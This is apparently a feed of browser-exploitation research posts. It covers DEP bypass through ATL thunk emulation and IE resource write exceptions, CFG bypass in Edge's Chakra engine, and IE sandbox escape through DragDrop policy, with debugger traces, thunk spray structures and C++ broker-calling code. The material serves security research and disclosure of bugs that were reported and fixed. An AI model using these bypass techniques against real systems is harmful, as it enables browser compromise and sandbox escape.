eax=00000041 ebx=1e2e31b0 ecx=00000000 edx=00000083 esi=1e2e31b0 edi=68b77fe5
eip=69c6585f esp=0363ac00 ebp=0363ac84 iopl=0         nv up ei pl nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010207
jscript9!Js::JavascriptOperators::OP_SetElementI+0x117:
69c6585f 88040f          mov     byte ptr [edi+ecx],al      ds:002b:68b77fe5=76
0:008> !exchain
0363b0f0: jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+1570 (69b421d1)
0363b648: jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+1570 (69b421d1)
0363bab8: jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+1570 (69b421d1)
0363bb78: jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+28c0 (69c71564)
0363bbc0: jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+2898 (69c7150f)
0363bc44: jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+276a (69d0dedd)
0363c588: MSHTML!_except_handler4+0 (66495fa4)
  CRT scope  0, filter: MSHTML! ... Omitted... (6652bbe8) 
                func:   MSHTML!... Omitted... (6652bbf1)
0363c62c: user32!_except_handler4+0 (7569a61e)
  CRT scope  0, func:   user32!UserCallWinProcCheckWow+123 (75664456)
0363c68c: user32!_except_handler4+0 (7569a61e)
  CRT scope  0, filter: user32!DispatchMessageWorker+15e (756659b7)
                func:   user32!DispatchMessageWorker+171 (756659ca)
0363f9a8: ntdll!_except_handler4+0 (776a71f5)
  CRT scope  0, filter: ntdll!__RtlUserThreadStart+2e (776a74d0)
                func:   ntdll!__RtlUserThreadStart+63 (776a90eb)
0363f9c8: ntdll!FinalExceptionHandler+0 (776f7428)

In the above exception handler chain, the exception handler in mshtml.dll will call kernel32!RaiseFailFastException(). If g_fFailFastHandlerDisabled is set to false, the process will be terminated:

int __thiscall RaiseFailFastExceptionFilter(int this) {
  signed int **v1; // esi@1
  CONTEXT *v2; // ST04_4@2
  signed int v3; // eax@2
  UINT v4; // ST08_4@4
  HANDLE v5; // eax@4

  v1 = (signed int **)this;
  if ( !g_fFailFastHandlerDisabled )
  {
    v2 = *(CONTEXT **)(this + 4);
    g_fFailFastHandlerDisabled = 1;
    RaiseFailFastException(*(PEXCEPTION_RECORD *)this, v2, 2u);
    v3 = 1653;
    if ( *v1 )
      v3 = **v1;
    v4 = v3;
    v5 = GetCurrentProcess();
    TerminateProcess(v5, v4);
  }
  return 0;
}

However, if g_fFailFastHandlerDisabled is set to true, the exception handling chain will call into kernel32!UnhandledExceptionFilter(), and finally kernel32!CheckForReadOnlyResourceFilter():

int __stdcall CheckForReadOnlyResourceFilter(int a1) {
  int result; // eax@2

  if ( BasepAllowResourceConversion )
    result = CheckForReadOnlyResource(a1, 0);
  else
    result = 0;
  return result;
}

If BasepAllowResourceConversion is also true, CheckForReadOnlyResource() will set the target page to writable, and return normally.

That is, if we first modify g_fFailFastHandlerDisabled and BasepAllowResourceConversion flag to true, we can then directly modify the resource in ieframe.dll without worrying about read-only attributes, the operating system will take care of it for us.

Another small obstacle. Once page attribute modification is triggered in CheckForReadOnlyResource(), the RegionSize of the memory attribute will also be change to one page size, usually 0x1000. Before IE create renderer instances with HTML resources in ieframe.dll, mshtml!GetResource() checks if the RegionSize attribute is larger than the size of the resource, and fails otherwise. The solution is to completely overwrite the resource from start to end, the RegionSize will increase accordingly and the check is therefore bypassed.

We now have a surreal exploit thanks to the special case for PE resource section in Windows write exception.

0x02 Executing the unexecutable memory locations

In my VARA 2009 talk “Time Factors in Vulnerability Hunting” I introduced a rare module address use-after-free vulnerability. For example, Thread A calls a function in module X, module X in turn calls a time consuming function in module Y. if thread B unloads module X before the function call returns, the return address is invalid when the function call returns. I found such problems in Flash module of the Opera browser at that time. One of the download managers also had similar problems.

Some other vulnerability categories also exhibit similar properties – execution is possible but the address is not controllable. In environments without DEP, these kind of vulnerabilities are not hard to exploit – we only need to spray the code to the target address. But with DEP enabled, these vulnerabilities are usually considered unexploitable.

But if we spray the target address with the following data:

typedef struct _THUNK3 {
    UCHAR MovEdx;       // 0xba         mov edx, imm32
    LONG EdxImmediate; 
    UCHAR MovEcx;       // 0xb9         mov ecx, imm32
    LONG EcxImmediate; // <- put your Stack Pivot here
    USHORT JmpEcx;      // 0xe1ff       jmp ecx
} Thunk3;

With DEP enabled, the target memory location is no doubt unexecutable, but surprisingly the system seems still executed these instructions, and jumped to the location in ecx. We only need to set ecx to jump to arbitrary memory location and execute the ROP chain.

For compatibility reasons, Windows implemented a mechanism called ATL thunk emulation. When the Windows kernel is handling execution exceptions, it checks if the exception address looks like a ATL thunk. If so, the kernel emulate its execution with KiEmulateAtlThunk() routine.

There are some limitations. ATL thunk emulation checks if the target address is within a PE file, and CFG checks are also enforced on supported systems. After Windows Vista, ATL thunk emulation only applies to applications compiled without IMAGE_DLLCHARACTERISTICS_NX_COMPAT under default DEP policy. If /NXCOMPAT is specified in compiler flag, the ATL thunk emulation is no longer supported. But there are still a lot of programs that does support the ATL thunk emulation, as seen in many third party application, and 32-bit iexplore.exe. Vulnerability such as CVE-2015-2425 in Hacking Team leaked emails is also exploitable with this technique if a heap spray is successful.

By abusing the ATL thunk emulation in system exception handling procedure, we make the unexcutable executable again, and bring some unexploitable vulnerabilities back to life.

Majority of this article was written in October 2014. Module addresses and symbol information were from Windows Technical Preview 6.4.9841 x64 with Internet Explorer 11.

References:

[1] ROPs are for the 99%, CanSecWest 2014, Yang Yu
[2] Bypassing Browser Memory Protections
[3] (CVE-2015-2425) “Gifts” From Hacking Team Continue, IE Zero-Day Added to Mix
[4] Time Factors in Vulnerability Hunting,VARA 2009

]]>
Use Chakra engine again to bypass CFG http://xlab.tencent.com/en/2016/01/04/use-chakra-engine-again-to-bypass-cfg/ Mon, 04 Jan 2016 08:19:56 +0000 http://xlab.tencent.com/en/?p=84 Continue reading "Use Chakra engine again to bypass CFG"]]>

This post is initially inspired by a talk with @TK, during which I learned the process and detail on how to successfully bypass CFG (reference: use Chakra JIT to bypass DEP and CFG). Due to my interest in its technology, I spent some time reading related materials and found another position to bypass CFG. I would like to thanks @TK for enlightening me on the ideas and techniques mentioned in this post.

There are plenty of articles that focus on the analysis of CFG, if you are interested, you may refer to my previous speech on HitCon 2015(《spartan 0day & exploit》). To be clear, this post is the part that is not revealed in my speech. At this point, the method to implement arbitrary code execution on edge through a write to memory is completely revealed.

0x01 the function calling logic of Chakra

When the chakra engine calls a function, it will conduct different process based on different function status, for example, the function called first time, the function called multi-times, DOM interface function an the function compiled by jit. Different types of functions have different processing flow, but all processing will be achieved by the Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > > function through calling the Js::JavascriptFunction::CallFunction<1> function.

1.the first call and the multiple calls of a function

When the following script is called, the function Js::JavascriptFunction::CallFunction<1> will be called by Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >.

function test(){}

test();

If the function is called for the first time, the execution flow will be:

chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >
    |-chakra!Js::JavascriptFunction::CallFunction<1>
        |-chakra!Js::JavascriptFunction::DeferredParsingThunk
            |-chakra!Js::JavascriptFunction::DeferredParse
            |-chakra!NativeCodeGenerator::CheckCodeGenThunk
                |-chakra!Js::InterpreterStackFrame::DelayDynamicInterpreterThunk
                    |-jmp_code
                        |-chakra!Js::InterpreterStackFrame::InterpreterThunk

If the function is called again, the calling process will be:

chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >
    |-chakra!Js::JavascriptFunction::CallFunction<1>
        |-chakra!NativeCodeGenerator::CheckCodeGenThunk
            |-chakra!Js::InterpreterStackFrame::DelayDynamicInterpreterThunk
                |-jmp_code
                    |-chakra!Js::InterpreterStackFrame::InterpreterThunk

These two calling flows are almost identical. The mainly difference is when the function is called the first time, it has to use the DeferredParsingThunk function to resolve it. This design is for high efficiency. But the subsequent call will directly execute it.

By analysis, the sub function called by Js::JavascriptFunction::CallFunction<1> is obtained through the data in the Js::ScriptFunction object. The functions called subsequently Js::JavascriptFunction::DeferredParsingThunk and NativeCodeGenerator::CheckCodeGenThunk are both included in the Js::ScriptFunction object. Here are the differences of Js::ScriptFunction in two different calls.

The object Js::ScriptFunction called the first time:

0:010> u poi(06eaf050 )
chakra!Js::ScriptFunction::`vftable':

0:010> dd 06eaf050 
06eaf050  5f695580 06eaf080 00000000 00000000

0:010> dd poi(06eaf050+4) 
06eaf080  00000012 00000000 06e26c00 06e1fea0
06eaf090  5f8db3f0 00000000 5fb0b454 00000101

0:010> u poi(poi(06eaf050+4)+0x10)
chakra!Js::JavascriptFunction::DeferredParsingThunk:

The object Js::ScriptFunction called the second time:

0:010> u poi(06eaf050 )
chakra!Js::ScriptFunction::`vftable':

0:010> dd 06eaf050 
06eaf050  5f695580 1ce1a0c0 00000000 00000000

0:010> dd poi(06eaf050+4)
1ce1a0c0  00000012 00000000 06e26c00 06e1fea0
1ce1a0d0  5f8db9e0 00000000 5fb0b454 00000101

0:010> u poi(poi(06eaf050+4)+0x10)
chakra!NativeCodeGenerator::CheckCodeGenThunk:

So the differences between the first call and the subsequent calls are achieved by changing the function pointer in the Js::ScriptFunction object.

2.jit of the function

Next we’ll look at the jit of the function. Here is the script code for test, which triggers its jit through multiple calling the test1 function.

function test1(num)
{
    return num + 1 + 2 + 3;
}

//trigger jit

test1(1);

The Js::ScriptFunction object that goes through jit.

//new debug, the memory address of the object will be different

0:010> u poi(07103050 )
chakra!Js::ScriptFunction::`vftable':

0:010> dd 07103050 
07103050  5f695580 1d7280c0 00000000 00000000

0:010> dd poi(07103050+4)
1d7280c0  00000012 00000000 07076c00 071080a0
1d7280d0  0a510600 00000000 5fb0b454 00000101

0:010> u poi(poi(07103050+4)+0x10)          //jit code
0a510600 55              push    ebp
0a510601 8bec            mov     ebp,esp
0a510603 81fc5cc9d005    cmp     esp,5D0C95Ch
0a510609 7f21            jg      0a51062c
0a51060b 6a00            push    0
0a51060d 6a00            push    0
0a51060f 68d0121b04      push    41B12D0h
0a510614 685c090000      push    95Ch
0a510619 e802955b55      call    chakra!ThreadContext::ProbeCurrentStack2 (5fac9b20)
0a51061e 0f1f4000        nop     dword ptr [eax]
0a510622 0f1f4000        nop     dword ptr [eax]
0a510626 0f1f4000        nop     dword ptr [eax]
0a51062a 6690            xchg    ax,ax
0a51062c 6a00            push    0
0a51062e 8d6424ec        lea     esp,[esp-14h]
0a510632 56              push    esi
0a510633 53              push    ebx
0a510634 b8488e0607      mov     eax,7068E48h
0a510639 8038ff          cmp     byte ptr [eax],0FFh
0a51063c 7402            je      0a510640
0a51063e fe00            inc     byte ptr [eax]
0a510640 8b450c          mov     eax,dword ptr [ebp+0Ch]
0a510643 25ffffff08      and     eax,8FFFFFFh
0a510648 0fbaf01b        btr     eax,1Bh
0a51064c 83d802          sbb     eax,2
0a51064f 7c2f            jl      0a510680
0a510651 8b5d14          mov     ebx,dword ptr [ebp+14h] //ebx = num
0a510654 8bc3            mov     eax,ebx        //eax = num (num << 1 & 1)
0a510656 d1f8            sar     eax,1          //eax = num >> 1
0a510658 732f            jae     0a510689
0a51065a 8bf0            mov     esi,eax
0a51065c 8bc6            mov     eax,esi
0a51065e 40              inc     eax            //num + 1
0a51065f 7040            jo      0a5106a1
0a510661 8bc8            mov     ecx,eax
0a510663 83c102          add     ecx,2          //num + 2
0a510666 7045            jo      0a5106ad
0a510668 8bc1            mov     eax,ecx
0a51066a 83c003          add     eax,3          //num + 3
0a51066d 704a            jo      0a5106b9
0a51066f 8bc8            mov     ecx,eax
0a510671 d1e1            shl     ecx,1          //ecx = num << 1
0a510673 7050            jo      0a5106c5
0a510675 41              inc     ecx            //ecx = num += 1
0a510676 8bd9            mov     ebx,ecx
0a510678 8bc3            mov     eax,ebx
0a51067a 5b              pop     ebx
0a51067b 5e              pop     esi
0a51067c 8be5            mov     esp,ebp
0a51067e 5d              pop     ebp
0a51067f c3              ret

The pointer to NativeCodeGenerator::CheckCodeGenThunk in the Js::ScriptFunction object is changed to a pointer to jit code after jit. The implementation directly called the jit code.

Simply speaking, when the called function passes it parameters, it first rotates one bit left, and pass the values after the lowest bit 1(parameter = (num << 1) & 1). So the first thing to do after getting the parameter is to rotate one bit right to get the original parameter value. As for why, I suppose it’s caused by the garbage collection mechanism of the script engine, which separates object and data by the lowest bit.

chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >
    |-chakra!Js::JavascriptFunction::CallFunction<1>
        |-jit code

When calling the jit function, the calling stack is as the above, this is the method that chakra engine uses to call the jit function.

3.DOM interface function

To cover everything, there is another kind of function to mention, that’s DOM interface function, a function provided by other engines, such as the rendering engine (theoretically it can be other engines as will).

document.createElement("button");

On execution, the above script will use the following function calling process, until call the engine that provides the interface function.

chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >
    |-chakra!Js::JavascriptFunction::CallFunction<1>
        |-chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk //call dom interface function
            |-dom_interface_function    //EDGEHTML!CFastDOM::CDocument::Trampoline_createElement

When calling the interface function, the Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > > function and the function object used in the subsequent process differ from the ones used previously, it is the Js::JavascriptExternalFunction object. Then similar to the previosfunction call, it also resolves the function pointer in their subject and calls it; finally it enters the wanted DOM interface function.

0:010> u poi(06f2cea0)
chakra!Js::JavascriptExternalFunction::`vftable':

0:010> dd 06f2cea0 
06f2cea0  5f696c4c 06e6f7a0 00000000 00000000

0:010> dd poi(06f2cea0+4)
06e6f7a0  00000012 00000000 06e76c00 06f040a0
06e6f7b0  5f8c6130 00000000 5fb0b454 00000101

0:010> u poi(poi(06f2cea0+4)+0x10)
chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk:

These are the different call methods that chakra engine uses to call different types of functions.

0x02 Exploit and Exploitation

After describing the call methods for all sorts of chakra engines, now we’ll check out the very important cog vulnerability. As mentioned above, the first calling process differs from the sub sequent ones. Let’s look at the logic here; the following is the call stack:

//the first call
chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >
    |-chakra!Js::JavascriptFunction::CallFunction<1>
        |-chakra!Js::JavascriptFunction::DeferredParsingThunk
            |-chakra!Js::JavascriptFunction::DeferredParse    //obtain NativeCodeGenerator::CheckCodeGenThunk function
            |-chakra!NativeCodeGenerator::CheckCodeGenThunk
                |-chakra!Js::InterpreterStackFrame::DelayDynamicInterpreterThunk
                    |-jmp_code  
                        |-chakra!Js::InterpreterStackFrame::InterpreterThunk

What is not mentioned above is the Js::JavascriptFunction::DeferredParse function in the above process. Function resolution related work is conducted in this function, and this function returns the pointer value of NativeCodeGenerator::CheckCodeGenThunk, then returns Js::JavascriptFunction::DeferredParsingThunk and calls it. The pointer of NativeCodeGenerator::CheckCodeGenThunk is also obtained through resolving the Js::JavascriptFunction object. Here is the code.

int __cdecl Js::JavascriptFunction::DeferredParsingThunk(struct Js::ScriptFunction *p_script_function)
{
  NativeCodeGenerator_CheckCodeGenThunk = Js::JavascriptFunction::DeferredParse(&p_script_function);
  return NativeCodeGenerator_CheckCodeGenThunk();
}
.text:002AB3F0 push    ebp
.text:002AB3F1 mov     ebp, esp
.text:002AB3F3 lea     eax, [esp+p_script_function]
.text:002AB3F7 push    eax             ; struct Js::ScriptFunction **
.text:002AB3F8 call    Js::JavascriptFunction::DeferredParse
.text:002AB3FD pop     ebp
.text:002AB3FE jmp     eax

On this jump position, no CFG check is made on the function pointer in eax. Therefore, this can be used to hijack the eip. But first you need to know how the function pointer NativeCodeGenerator::CheckCodeGenThunk returned by the Js::JavascriptFunction::DeferredParse function is resolved through the Js::ScriptFunction object. Here is the resolution process.

0:010> u poi(070af050)
chakra!Js::ScriptFunction::`vftable':

0:010> dd 070af050 + 14
070af064  076690e0 5fb11ef4 00000000 00000000

0:010> dd 076690e0 + 10
076690f0  076690e0 04186628 07065f90 00000000

0:010> dd 076690e0 + 28
07669108  07010dc0 000001a8 00000035 00000000

0:010> dd 07010dc0 
07010dc0  5f696000 05a452b8 00000000 5f8db9e0

0:010> u 5f8db9e0
chakra!NativeCodeGenerator::CheckCodeGenThunk:

As shown above, Js::JavascriptFunction::DeferredParse gets the NativeCodeGenerator::CheckCodeGenThunk function pointer by resolving the Js::ScriptFunction object, the resolving method is abbreviated as [[[Js::ScriptFunction+14]+10]+28]+0c. So just by forging the data in this memory, it can trigger the call of Js::JavascriptFunction::DeferredParse by calling the function, further to hijack the eip, as shown below.

0:010> g
Breakpoint 0 hit
eax=603ba064 ebx=063fba10 ecx=063fba40 edx=063fba40 esi=00000001 edi=058fc6b0
eip=603ba064 esp=058fc414 ebp=058fc454 iopl=0         nv up ei ng nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000283
chakra!`dynamic initializer for 'DOMFastPathInfo::getterTable''+0x734:
603ba064 94              xchg    eax,esp
603ba065 c3              ret

By this way, cfg is bypassed and eip is hijacked. This method is simple and stable. It’s convenient to use when you get access to read and write the memory. This exploit has been reported to Microsoft on 25th July, 2015.

0x03 Mitigation

Microsoft has fixed all the exploits in this post. The mitigation plan is relatively easy, which is to add cft check at this jump.

.text:002AB460 push    ebp
.text:002AB461 mov     ebp, esp
.text:002AB463 lea     eax, [esp+arg_0]
.text:002AB467 push    eax
.text:002AB468 call    Js::JavascriptFunction::DeferredParse
.text:002AB46D mov     ecx, eax        ; this
.text:002AB46F call    ds:___guard_check_icall_fptr  //add cfg check
.text:002AB475 mov     eax, ecx
.text:002AB477 pop     ebp
.text:002AB478 jmp     eax

Reference

  1. 《Bypass DEP and CFG using JIT compiler in Chakra engine》

  2. 《spartan 0day & exploit》

]]>
Drag & Drop Security Policy of IE Sandbox http://xlab.tencent.com/en/2015/12/18/drag-drop-security-policy-of-ie-sandbox/ Fri, 18 Dec 2015 11:03:51 +0000 http://xlab.tencent.com/en/?p=82 Continue reading "Drag & Drop Security Policy of IE Sandbox"]]>

There is a kind of vulnerability that uses the flaw of whitelist applications in ElevationPolicy settings to accomplish sandbox bypass. A DragDrop policy setting similar to ElevationPolicy in the IE registry attracts our attention. In this post, the writer will try every possible means to break IE sandbox from the perspective of an attacker by analyzing all obstacles ahead to detail the drag drop security policy of IE sandbox.

0x01 DragDrop Policy of IE sandbox

Among all IE sandbox bypass techniques, there’s one that uses the issue of whitelist applications in ElevationPolicy to execute arbitrary code. In the registry, there is a configuration called DragDrop similar to ElevationPolicy. The specific registry path is:

HKLM\Software\Microsoft\Internet Explorer\Low Rights\DragDrop

As shown in the figure:

Here are the meanings for values of the DragDrop policy:

0: If the target window is not valid DropTarget, reject;

1: If the target window is valid DropTarget, but cannot copy contents;

2: Use popup to ask for user’s permission. If allowed, copy contents; to the target window;

3: Allow silent drag drop.

In a clean Windows 8.1, there are 3 applications under the DragDrop directory by default: iexplore.exe, explorer.exe, notepad.exe. The policy value for each is 3. When the policy value of the target application is 2 and drag a file to the target window, IE would pop up a prompt like this:

0x02 DragDrop Issue for the Explorer process

When drag files from IE to Explorer, although the DragDrop policy value is set to 3, IE won’t pop up anything, but the Explorer process will pop a prompt like this:

Of course, when we drag files from IE to the tree folder structure of Explorer’s sidebar, no prompt will pop up. This may be an imperfection in the implementation of the Explorer application. In second thought, if we can simulate mouse operations of drag and drop in IE sandbox, we’ll be able to use this Explorer issue to cross the security boundary of the IE sandbox.

0x03 Finish OLE Drag Drop without the Mouse

OLE dragdrop is a generic file dragging method. It uses the design for OLE interface to implement the drag and drop operations, making it generic and modular. The OLE dragdrop technique includes three basic interfaces:

  • IDropSource Interface: represents the source object where the dragdrop operation is issued, implemented by source object;

  • IDropTarget Interface: represents the target object on which the dragdrop operation is taken, implemented by target object;

  • IDataObject Interface: represents the data transferred during the dragdrop operation, implemented by source object;

This figure describes the key components required by a complete OLE dragdrop operation:

To simulate the drag and drop operations of a mouse, all we need is to implement IDropSourceinterface and IDataObject interface. The core of normal OLE dragdrop operation is to call the ole32!DoDragDrop function, here is the function prototype:

HRESULTDoDragDrop(
IDataObject*pDataObject,   // Pointer to the data object
IDropSource *pDropSource,   // Pointer to the source
   DWORD     dwOKEffect,    // Effects allowed by the source
   DWORD     *pdwEffect      // Pointer to effects on the source
);

Information on the source object and data of dragdrop operation is included in parameters of DoDragDrop. Within the DoDragDrop function, it uses the position of the mouse pointer to obtain information about the source object. In the following, the writer gives a method that uses code emulator instead of mouse to achieve dragdrop operation.

To simulate the dragdrop operation from a mouse by using code emulator, that is to isolate the GUI operation part from the DoDragDrop function, find the function that does dragdrop operation, pass the required parameter to it to finish the operation. In the case of ole32.dll 6.1.7601.18915 in Win7, I’ll illustrate the internal implementation of DragDrop.

Here is the main logic of Ole32!DoDragDrop:

HRESULT __stdcallDoDragDrop(LPDATAOBJECT pDataObj, LPDROPSOURCE pDropSource, DWORD dwOKEffects, LPDWORD pdwEffect)
{
CDragOperationdrgop;
    HRESULT hr;

    CDragOperation::CDragOperation(drgop, pDataObj, pDropSource, dwOKEffects, pdwEffect, hr);
    if ( hr= 0 ){
      while ( CDragOperation::UpdateTarget(drgop)
        CDragOperation::DragOver(drgop)
        CDragOperation::HandleMessages(drgop) )
        hr = CDragOperation::CompleteDrop(drgop);
    }
    CDragOperation::~CDragOperation(drgop);

    return hr;
}


CDragOperation::CDragOperation is a constructed function. Its important initial operations include:

ole32!GetMarshalledInterfaceBuffer
ole32!ClipSetCaptureForDrag
    --ole32!GetPrivateClipboardWindow
ole32!CreateSharedDragFormats

The next While loop will determine the dragdrop status. At last, CompleteDrop will complete the operation, the key function call is like this:

ole32!CDragOperation::UpdateTarget
  -ole32!CDragOperation::GetDropTarget
       --ole32!PrivDragDrop
ole32!CDragOperation::DragOver
  --ole32!CDropTarget::DragOver
       --ole32!PrivDragDrop
ole32!CDragOperation::CompleteDrop
  --ole32!CDropTarget::Drop
       --ole32!PrivDragDrop

As it can be seen, it’s the ole32!PrivDragDrop function that finally does the dragdrop operation, by using the hardcoded offset of the function address to call the internal function in ole32.dll. We define a DropData function to simulate the dropdrag operation from the mouse, the input parameters of which are the target windows handle and the IDataObject pointer of the file being dragged, the main logic is as follows:

auto DropData(HWND hwndDropTarget, IDataObject* pDataObject)
{
    GetPrivateClipboardWindow(CLIP_CREATEIFNOTTHERE);
    CreateSharedDragFormats(pDataObject);
    void *DOBuffer = nullptr;
    HRESULT result = GetMarshalledInterfaceBuffer(IID_IDataObject, pDataObject, DOBuffer);

    if (SUCCEEDED(result)){
        DWORD dwEffect = 0;
        POINTL ptl = { 0, 0 };
        void *hDDInfo = nullptr;
        HRESULT result = PrivDragDrop(hwndDropTarget, DRAGOP_ENTER, DOBuffer, pDataObject, MK_LBUTTON, ptl, dwEffect, 0, hDDInfo);
        if (SUCCEEDED(result)){
            HRESULT result = PrivDragDrop(hwndDropTarget, DRAGOP_OVER, 0, 0, MK_LBUTTON, ptl, dwEffect, 0, hDDInfo);
            if (SUCCEEDED(result)){
                HWND hClip = GetPrivateClipboardWindow(CLIP_QUERY);
                HRESULT result = PrivDragDrop(hwndDropTarget, DRAGOP_DROP, DOBuffer, pDataObject, 0, ptl, dwEffect, hClip, hDDInfo);
            }
        }
    }
    return result;
}

The target window handle can be obtained through the FindWindow function. There are two methods to pack a DataObject and get the pointer of its IDataObject interface:

  • Write your own C++ class to implement the IDataObject interface;

  • Use the existing implementation in the class library, for instance, both MFC and Shell32 provide related class to implement the DragDrop interface.

The writer explains how to use MFC class library to pack a DataObject and get the pointer of its IDataObject interface, here is the implementation code:

auto GetIDataObjectForFile(CStringfilePath)
{
    COleDataSource* pDataSource = new COleDataSource();
    IDataObject*    pDataObject;
    UINT            uBuffSize = 0;
    HGLOBAL         hgDrop;
    DROPFILES*      pDrop;
    TCHAR*          pszBuff;
    FORMATETC     fmtetc = { CF_HDROP, NULL, DVASPECT_CONTENT, -1, TYMED_HGLOBAL };

    uBuffSize = sizeof(DROPFILES) + sizeof(TCHAR) * (lstrlen(filePath) + 2);
    hgDrop = GlobalAlloc(GHND | GMEM_SHARE, uBuffSize);
    if (hgDrop != nullptr){
        pDrop = (DROPFILES*)GlobalLock(hgDrop);
        if (pDrop != nullptr){
            pDrop-pFiles = sizeof(DROPFILES);
#ifdef _UNICODE
            pDrop-fWide = TRUE;
#endif
            pszBuff = (TCHAR*)(LPBYTE(pDrop) + sizeof(DROPFILES));
            lstrcpy(pszBuff, (LPCTSTR)filePath);
            GlobalUnlock(hgDrop);
            pDataSource-CacheGlobalData(CF_HDROP, hgDrop, fmtetc);
            pDataObject = (IDataObject *)pDataSource-GetInterface(IID_IDataObject); 
        }else{
            GlobalFree(pDrop);
            pDataObject = nullptr;
        }
    }else{
        GlobalFree(hgDrop);
        pDataObject = nullptr;
    }
    return pDataObject;
}

0x04 Drag Drop Implementation of IE Sandbox

When we use mouse to does the dragdrop operation in IE sandbox, the IE tab process in the sandbox will transfer data to the main process outside the sandbox through ShdocvwBroker. That’s to say, the actual dragdrop operation is completed in the IE main process outside of the sandbox. The function calls for the two processes are almost like the following:

IE sub process (inside the sandbox):

MSHTML!CDoc::DoDrag
--MSHTML!CDragDropManager::DoDrag
--combase!ObjectStubless
    -- … send ALPC message to OE main process

IE main process:

… receive the ALP message from IE sub process
    --RPCRT4!Invoke
--IEFRAME!CShdocvwBroker::PerformDoDragDrop
            --IEFRAME!CShdocvwBroker::PerformDoDragDropThreadProc
                --ole32!DoDragDrop

0x05 Security Limits that IE Sandbox Applies to the Drag Drop Operation

In IE sandbox, we can directly call the function in Broker. By building an IEUserBroker and using the IEUserBroker to build an ShdocvwBroker, we will be able to call the IEFRAME!CShdocvwBroker::PerformDoDragDrop function in the main process. The calling method is like the following:

typedef HRESULT(__stdcall *FuncCoCreateUserBroker)(IIEUserBroker **ppBroker);
IIEUserBrokerPtrCreateIEUserBroker()
{
    HMODULE hMod = LoadLibraryW(Liertutil.dll);
    FuncCoCreateUserBrokerCoCreateUserBroker;
    CoCreateUserBroker = (FuncCoCreateUserBroker)GetProcAddress(hMod, (LPCSTR)58);
    if (CoCreateUserBroker)
    {
        IIEUserBrokerPtr broker;
        HRESULT ret = CoCreateUserBroker(broker);
        return broker;
    }
    return nullptr;
}

IIEUserBrokerPtr broker = CreateIEUserBroker();
IShdocvwBroker* shdocvw;
broker-BrokerCreateKnownObject(clsid_CIERecoveryStore, _uuidof(IRecoveryStore), (IUnknown**)shdocvw);
shdocvw-PerformDoDragDrop(HWND__ *,IEDataObjectWrapper *,IEDropSourceWrapper *,ulong,ulong,ulong *,long *);

The DragDrop function is eventually by calling the ole32!DoDragDrop function, all the parameters that DoDragDrop requires can be passed by the PerformDoDragDrop function(refer to the parameter information of the DoDragDrop function mentioned in chapter 0x03). At this time, we already can walk through inside the sandbox to the outside ole32!DoDragDrop function and pass the controllable parameters. However, there are two principles to simulate the dragdrop operation of a mouse:

  • Use the method mentioned in chapter 0x02 to directly call the internal function in ole32.dll;

  • Call API to change the position of the mouse.

For the first method, since we are in the sandbox, we can only use the proxy for Broker interface to get out of the sandbox and get in the process space for the IE main process. So we cannot call the internal function of the dell in the main process, further, this method is not feasible.

The second method, if we can change the position of the mouse, then inside the ole32!DoDragDrop function, we can use mouse position to get information on the target window. However, during experiment, we notice that it’s not possible to change mouse position through API inside the sandbox. The next case will illustrate this problem.

The writer can think of two ways to change the mouse position:

1.Simulate mouse movements through the SendInput function. The following shows the calling connection of the SendInput function from user mode to kernel mode:

User32!SendInput
--user32!NtUserSendInput
        --win32k.sys!NtUserSendInput
            --win32k.sys!xxxSendInput
                --win32k.sys!xxxMouseEventDirect

2.Change mouse position through the SetCursorPos function. The following shows the calling connection of the SetCursorPos function from user mode to kernel mode:

user32!SetCursorPos
        --user32!SetPhysicalCursorPos
            --user32!NtUserCallTwoParam
                --win32k.sys!NtUserCallTwoParam
                    --win32k.sys!zzzSetCursorPos
                        --win32k.sys!zzzSetCursorPosByType

First is SendInput, if directly calling the SendInput function in IE sandbox, it returns 0x5 access denied error, because the SendInput function is hooked in IEShims.dll and the hook function is processed. The specific function position requires processing is:

This hook is easy to bypass, we’ll directly call NtUserSendInput, but this function has no export, that’s why it’s required to hardcode its address through function offset. Directly calling the NtUserSendInput function, it returns no error, but the position of the mouse doesn’t change. Because the failure of the call is caused by the limits of UIP(User Interface Privilege Isolation). It’s the same when calling the SetCursorPos function.

UPI is a new security feature since Windows Vista, it’s implemented in the Windows kernel, and the specific position is as the following:

win32k!CheckAccessForIntegrityLevel

In Win8.1, this is the logic of the function:

signed int __stdcall CheckAccessForIntegrityLevelEx(
            unsigned int CurrentProcessIntegrityLevel, 
            int          CurrentIsAppContainer, 
            unsigned int TargetProcessIntegrityLevel, 
            int          TargetIsAppContainer)
{
    signed int result;
    if (gbEnforceUIPICurrentProcessIntegrityLevelTargetProcessIntegrityLevel )
        result = 0;
    esle if ( gbEnforceUIPICurrentProcessIntegrityLevel == TargetProcessIntegrityLevel )
